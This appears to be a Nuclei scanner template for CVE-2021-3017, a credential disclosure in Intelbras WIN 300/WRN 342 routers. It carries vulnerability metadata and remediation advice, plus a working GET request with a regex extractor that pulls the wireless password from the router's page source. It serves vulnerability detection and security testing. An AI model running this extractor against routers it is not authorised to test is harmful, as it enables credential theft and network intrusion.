id: CVE-2021-3017 info: name: Intelbras WIN 300/WRN 342 - Credentials Disclosure author: pikpikcu severity: high description: Intelbras WIN 300 and WRN 342 devices through 2021-01-04 allows remote attackers to discover credentials by reading the def_wirelesspassword line in the HTML source code. impact: | An attacker can gain unauthorized access to the router's administrative interface and potentially compromise the entire network. remediation: | Update the router firmware to the latest version, which includes a fix for the vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-3017 - https://pastebin.com/cTYTf0Yn - https://github.com/bigblackhat/oFx - https://github.com/openx-org/BLEN - https://github.com/Miraitowa70/POC-Notes classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 epss-score: 0.01527 epss-percentile: 0.86768 cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelbras product: win_300_firmware tags: cve2021,cve,exposure,router,intelbras http: - method: GET path: - "{{BaseURL}}/index.asp" matchers-condition: and matchers: - type: word part: body words: - 'def_wirelesspassword =' - 'Roteador Wireless' condition: and - type: status status: - 200 extractors: - type: regex regex: - 'def_wirelesspassword = "([A-Za-z0-9=]+)";' part: body # digest: 490a00463044022046f96617b2d3f46fb61daf58af99864f5885417b5db82f144672de11b88aee0b02204fc94b7179768b51a7e4285534b628216666e5a2f21f503770ec483aa16e7c3a:922c64590222798bb761d5b6d8e72950